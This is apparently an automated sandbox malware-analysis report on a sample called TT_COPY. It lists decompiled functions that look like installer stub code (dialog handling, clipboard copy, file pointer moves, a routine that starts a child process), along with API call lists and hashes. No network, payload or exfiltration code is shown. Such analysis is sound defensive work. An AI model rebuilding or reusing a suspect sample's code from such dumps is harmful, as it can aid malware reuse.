                                                                                                                            • Instruction ID: 16132b7ab3ccf759bab3560491fdcf7a80ad1c1660ccb6c53b02c7dc80a3ccda
                                                                                                                            • Opcode Fuzzy Hash: 9707800b70a5dc258a843f75b77db4a9e667fe39b0680b7f20119b3797382917
                                                                                                                            • Instruction Fuzzy Hash: 48B012C682C90C1443CD70E8BC54ED961EE81CFCB05544F4CB425415D43F8331834DD0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004044CE(int _a4) {
                                                                                                                            				long _t2;
                                                                                                                            
                                                                                                                            				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                                                                                            				return _t2;
                                                                                                                            			}




                                                                                                                            0x004044dc
                                                                                                                            0x004044e2

                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                            • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                            • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                            • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004034E5(long _a4) {
                                                                                                                            				long _t2;
                                                                                                                            
                                                                                                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                            				return _t2;
                                                                                                                            			}




                                                                                                                            0x004034f3
                                                                                                                            0x004034f9

                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 973152223-0
                                                                                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E00401FA4() {
                                                                                                                            				void* _t9;
                                                                                                                            				intOrPtr _t13;
                                                                                                                            				void* _t15;
                                                                                                                            				void* _t17;
                                                                                                                            				void* _t20;
                                                                                                                            				void* _t22;
                                                                                                                            
                                                                                                                            				_t19 = E00402DA6(_t15);
                                                                                                                            				E0040559F(0xffffffeb, _t7);
                                                                                                                            				_t9 = E00405B20(_t19); // executed
                                                                                                                            				_t20 = _t9;
                                                                                                                            				if(_t20 == _t15) {
                                                                                                                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                            				} else {
                                                                                                                            					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                                                                            						_t13 = E004069B5(_t17, _t20);
                                                                                                                            						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                                                                            							if(_t13 != _t15) {
                                                                                                                            								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					_push(_t20);
                                                                                                                            					CloseHandle();
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}









                                                                                                                            0x00401faa
                                                                                                                            0x00401faf
                                                                                                                            0x00401fb5
                                                                                                                            0x00401fba
                                                                                                                            0x00401fbe
                                                                                                                            0x0040292e
                                                                                                                            0x00401fc4
                                                                                                                            0x00401fc7
                                                                                                                            0x00401fca
                                                                                                                            0x00401fd2
                                                                                                                            0x00401fe1
                                                                                                                            0x00401fe3
                                                                                                                            0x00401fe3
                                                                                                                            0x00401fd4
                                                                                                                            0x00401fd8
                                                                                                                            0x00401fd8
                                                                                                                            0x00401fd2
                                                                                                                            0x00401fea
                                                                                                                            0x00401feb
                                                                                                                            0x00401feb
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,00424A84,75DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,00424A84,75DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                                                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                              • Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                                                                                              • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                              • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                                                                                                                              • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                                                                                                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2972824698-0
                                                                                                                            • Opcode ID: 7b3da9c5f3f1b41421eabd7b64724d9f8300048c1db74a1cfd06f9463eb6dfe6
                                                                                                                            • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                                                                                                            • Opcode Fuzzy Hash: 7b3da9c5f3f1b41421eabd7b64724d9f8300048c1db74a1cfd06f9463eb6dfe6
                                                                                                                            • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004014D7(intOrPtr __edx) {
                                                                                                                            				long _t3;
                                                                                                                            				void* _t7;
                                                                                                                            				intOrPtr _t10;
                                                                                                                            				void* _t13;
                                                                                                                            
                                                                                                                            				_t10 = __edx;
                                                                                                                            				_t3 = E00402D84(_t7);
                                                                                                                            				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                                                                                            				if(_t3 <= 1) {
                                                                                                                            					_t3 = 1;
                                                                                                                            				}
                                                                                                                            				Sleep(_t3); // executed
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}







                                                                                                                            0x004014d7
                                                                                                                            0x004014d8
                                                                                                                            0x004014e1
                                                                                                                            0x004014e4
                                                                                                                            0x004014e8
                                                                                                                            0x004014e8
                                                                                                                            0x004014ea
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                                                                                            • Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
                                                                                                                            • Opcode Fuzzy Hash: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                                                                                            • Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E70B512BB() {
                                                                                                                            				void* _t3;
                                                                                                                            
                                                                                                                            				_t3 = GlobalAlloc(0x40,  *0x70b5506c +  *0x70b5506c); // executed
                                                                                                                            				return _t3;
                                                                                                                            			}




                                                                                                                            0x70b512c5
                                                                                                                            0x70b512cb

                                                                                                                            APIs
                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,70B512DB,?,70B5137F,00000019,70B511CA,-000000A0), ref: 70B512C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocGlobal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3761449716-0
                                                                                                                            • Opcode ID: fb96ca83bafcd7435e54a88920d6ba7bdb33b5e9322c17d4b4d1f248cae925a8
                                                                                                                            • Instruction ID: 5c63e79327c25b87d81a167cfa0e8bc9138f77ed5cc4264e8093545681ad1cfc
                                                                                                                            • Opcode Fuzzy Hash: fb96ca83bafcd7435e54a88920d6ba7bdb33b5e9322c17d4b4d1f248cae925a8
                                                                                                                            • Instruction Fuzzy Hash: 48B01272A04000DFEE108B65CC46F343264E700316F3C4080F700C21D0CA6049008534
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 95%
                                                                                                                            			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                            				struct HWND__* _v8;
                                                                                                                            				long _v12;
                                                                                                                            				struct tagRECT _v28;
                                                                                                                            				void* _v36;
                                                                                                                            				signed int _v40;
                                                                                                                            				int _v44;
                                                                                                                            				int _v48;
                                                                                                                            				signed int _v52;
                                                                                                                            				int _v56;
                                                                                                                            				void* _v60;
                                                                                                                            				void* _v68;
                                                                                                                            				void* __ebx;
                                                                                                                            				void* __edi;
                                                                                                                            				void* __esi;
                                                                                                                            				struct HWND__* _t94;
                                                                                                                            				long _t95;
                                                                                                                            				int _t100;
                                                                                                                            				void* _t108;
                                                                                                                            				intOrPtr _t130;
                                                                                                                            				struct HWND__* _t134;
                                                                                                                            				int _t156;
                                                                                                                            				int _t159;
                                                                                                                            				struct HMENU__* _t164;
                                                                                                                            				struct HWND__* _t168;
                                                                                                                            				struct HWND__* _t169;
                                                                                                                            				int _t171;
                                                                                                                            				void* _t172;
                                                                                                                            				short* _t173;
                                                                                                                            				short* _t175;
                                                                                                                            				int _t177;
                                                                                                                            
                                                                                                                            				_t169 =  *0x433ee4;
                                                                                                                            				_t156 = 0;
                                                                                                                            				_v8 = _t169;
                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                            					if(_a8 == 0x405) {
                                                                                                                            						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                                                            					}
                                                                                                                            					if(_a8 != 0x111) {
                                                                                                                            						L17:
                                                                                                                            						_t171 = 1;
                                                                                                                            						if(_a8 != 0x404) {
                                                                                                                            							L25:
                                                                                                                            							if(_a8 != 0x7b) {
                                                                                                                            								goto L20;
                                                                                                                            							}
                                                                                                                            							_t94 = _v8;
                                                                                                                            							if(_a12 != _t94) {
                                                                                                                            								goto L20;
                                                                                                                            							}
                                                                                                                            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                                                            							_a8 = _t95;
                                                                                                                            							if(_t95 <= _t156) {
                                                                                                                            								L36:
                                                                                                                            								return 0;
                                                                                                                            							}
                                                                                                                            							_t164 = CreatePopupMenu();
                                                                                                                            							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                                                            							_t100 = _a16;
                                                                                                                            							_t159 = _a16 >> 0x10;
                                                                                                                            							if(_a16 == 0xffffffff) {
                                                                                                                            								GetWindowRect(_v8,  &_v28);
                                                                                                                            								_t100 = _v28.left;
                                                                                                                            								_t159 = _v28.top;
                                                                                                                            							}
                                                                                                                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                                                            								_v60 = _t156;
                                                                                                                            								_v48 = 0x42d268;
                                                                                                                            								_v44 = 0x1000;
                                                                                                                            								_a4 = _a8;
                                                                                                                            								do {
                                                                                                                            									_a4 = _a4 - 1;
                                                                                                                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                                                            								} while (_a4 != _t156);
                                                                                                                            								OpenClipboard(_t156);
                                                                                                                            								EmptyClipboard();
                                                                                                                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                                                            								_a4 = _t108;
                                                                                                                            								_t172 = GlobalLock(_t108);
                                                                                                                            								do {
                                                                                                                            									_v48 = _t172;
                                                                                                                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                                                            									 *_t173 = 0xd;
                                                                                                                            									_t175 = _t173 + 2;
                                                                                                                            									 *_t175 = 0xa;
                                                                                                                            									_t172 = _t175 + 2;
                                                                                                                            									_t156 = _t156 + 1;
                                                                                                                            								} while (_t156 < _a8);
                                                                                                                            								GlobalUnlock(_a4);
                                                                                                                            								SetClipboardData(0xd, _a4);
                                                                                                                            								CloseClipboard();
                                                                                                                            							}
                                                                                                                            							goto L36;
                                                                                                                            						}
                                                                                                                            						if( *0x433ecc == _t156) {
                                                                                                                            							ShowWindow( *0x434f08, 8);
                                                                                                                            							if( *0x434f8c == _t156) {
                                                                                                                            								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
                                                                                                                            							}
                                                                                                                            							E00404472(_t171);
                                                                                                                            							goto L25;
                                                                                                                            						}
                                                                                                                            						 *0x42ba38 = 2;
                                                                                                                            						E00404472(0x78);
                                                                                                                            						goto L20;
                                                                                                                            					} else {
                                                                                                                            						if(_a12 != 0x403) {
                                                                                                                            							L20:
                                                                                                                            							return E00404500(_a8, _a12, _a16);
                                                                                                                            						}
                                                                                                                            						ShowWindow( *0x433ed0, _t156);
                                                                                                                            						ShowWindow(_t169, 8);
                                                                                                                            						E004044CE(_t169);
                                                                                                                            						goto L17;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				_v52 = _v52 | 0xffffffff;
                                                                                                                            				_v40 = _v40 | 0xffffffff;
                                                                                                                            				_t177 = 2;
                                                                                                                            				_v60 = _t177;
                                                                                                                            				_v56 = 0;
                                                                                                                            				_v48 = 0;
                                                                                                                            				_v44 = 0;
                                                                                                                            				asm("stosd");
                                                                                                                            				asm("stosd");
                                                                                                                            				_t130 =  *0x434f10;
                                                                                                                            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                                                            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                                                            				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                                                                                            				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                                                                                            				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                                                            				 *0x433ee4 = _t134;
                                                                                                                            				_v8 = _t134;
                                                                                                                            				E004044CE( *0x433ed0);
                                                                                                                            				 *0x433ed4 = E00404E27(4);
                                                                                                                            				 *0x433eec = 0;
                                                                                                                            				GetClientRect(_v8,  &_v28);
                                                                                                                            				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                                                            				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                                                                            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                                            				if(_a8 >= 0) {
                                                                                                                            					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                                                            					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                                                            				}
                                                                                                                            				if(_a12 >= _t156) {
                                                                                                                            					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                                                            				}
                                                                                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                            				_push(0x1b);
                                                                                                                            				E00404499(_a4);
                                                                                                                            				if(( *0x434f18 & 0x00000003) != 0) {
                                                                                                                            					ShowWindow( *0x433ed0, _t156);
                                                                                                                            					if(( *0x434f18 & 0x00000002) != 0) {
                                                                                                                            						 *0x433ed0 = _t156;
                                                                                                                            					} else {
                                                                                                                            						ShowWindow(_v8, 8);
                                                                                                                            					}
                                                                                                                            					E004044CE( *0x433ec8);
                                                                                                                            				}
                                                                                                                            				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                                                            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                                                            				if(( *0x434f18 & 0x00000004) != 0) {
                                                                                                                            					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                                                            					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                                                            				}
                                                                                                                            				goto L36;
                                                                                                                            			}

































                                                                                                                            0x004056e6
                                                                                                                            0x004056ec
                                                                                                                            0x004056f6
                                                                                                                            0x004056f9
                                                                                                                            0x0040588f
                                                                                                                            0x004058b3
                                                                                                                            0x004058b3
                                                                                                                            0x004058c6
                                                                                                                            0x004058e4
                                                                                                                            0x004058e6
                                                                                                                            0x004058ee
                                                                                                                            0x00405944
                                                                                                                            0x00405948
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040594a
                                                                                                                            0x00405950
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040595a
                                                                                                                            0x00405962
                                                                                                                            0x00405965
                                                                                                                            0x00405a67
                                                                                                                            0x00000000
                                                                                                                            0x00405a67
                                                                                                                            0x00405974
                                                                                                                            0x0040597f
                                                                                                                            0x00405988
                                                                                                                            0x00405993
                                                                                                                            0x00405996
                                                                                                                            0x0040599f
                                                                                                                            0x004059a5
                                                                                                                            0x004059a8
                                                                                                                            0x004059a8
                                                                                                                            0x004059c0
                                                                                                                            0x004059c9
                                                                                                                            0x004059cc
                                                                                                                            0x004059d3
                                                                                                                            0x004059da
                                                                                                                            0x004059e2
                                                                                                                            0x004059e2
                                                                                                                            0x004059f9
                                                                                                                            0x004059f9
                                                                                                                            0x00405a00
                                                                                                                            0x00405a06
                                                                                                                            0x00405a12
                                                                                                                            0x00405a19
                                                                                                                            0x00405a22
                                                                                                                            0x00405a24
                                                                                                                            0x00405a27
                                                                                                                            0x00405a36
                                                                                                                            0x00405a39
                                                                                                                            0x00405a3f
                                                                                                                            0x00405a40
                                                                                                                            0x00405a46
                                                                                                                            0x00405a47
                                                                                                                            0x00405a48
                                                                                                                            0x00405a50
                                                                                                                            0x00405a5b
                                                                                                                            0x00405a61
                                                                                                                            0x00405a61
                                                                                                                            0x00000000
                                                                                                                            0x004059c0
                                                                                                                            0x004058f6
                                                                                                                            0x00405926
                                                                                                                            0x0040592e
                                                                                                                            0x00405939
                                                                                                                            0x00405939
                                                                                                                            0x0040593f
                                                                                                                            0x00000000
                                                                                                                            0x0040593f
                                                                                                                            0x004058fa
                                                                                                                            0x00405904
                                                                                                                            0x00000000
                                                                                                                            0x004058c8
                                                                                                                            0x004058ce
                                                                                                                            0x00405909
                                                                                                                            0x00000000
                                                                                                                            0x00405912
                                                                                                                            0x004058d7
                                                                                                                            0x004058dc
                                                                                                                            0x004058df
                                                                                                                            0x00000000
                                                                                                                            0x004058df
                                                                                                                            0x004058c6
                                                                                                                            0x004056ff
                                                                                                                            0x00405703
                                                                                                                            0x0040570b
                                                                                                                            0x0040570f
                                                                                                                            0x00405712
                                                                                                                            0x00405715
                                                                                                                            0x00405718
                                                                                                                            0x0040571b
                                                                                                                            0x0040571c
                                                                                                                            0x0040571d
                                                                                                                            0x00405736
                                                                                                                            0x00405739
                                                                                                                            0x00405743
                                                                                                                            0x00405752
                                                                                                                            0x0040575a
                                                                                                                            0x00405762
                                                                                                                            0x00405767
                                                                                                                            0x0040576a
                                                                                                                            0x00405776
                                                                                                                            0x0040577f
                                                                                                                            0x00405788
                                                                                                                            0x004057aa
                                                                                                                            0x004057b0
                                                                                                                            0x004057c1
                                                                                                                            0x004057c6
                                                                                                                            0x004057d4
                                                                                                                            0x004057e2
                                                                                                                            0x004057e2
                                                                                                                            0x004057e7
                                                                                                                            0x004057f5
                                                                                                                            0x004057f5
                                                                                                                            0x004057fa
                                                                                                                            0x004057fd
                                                                                                                            0x00405802
                                                                                                                            0x0040580e
                                                                                                                            0x00405817
                                                                                                                            0x00405824
                                                                                                                            0x00405833
                                                                                                                            0x00405826
                                                                                                                            0x0040582b
                                                                                                                            0x0040582b
                                                                                                                            0x0040583f
                                                                                                                            0x0040583f
                                                                                                                            0x00405853
                                                                                                                            0x0040585c
                                                                                                                            0x00405865
                                                                                                                            0x00405875
                                                                                                                            0x00405881
                                                                                                                            0x00405881
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040589E
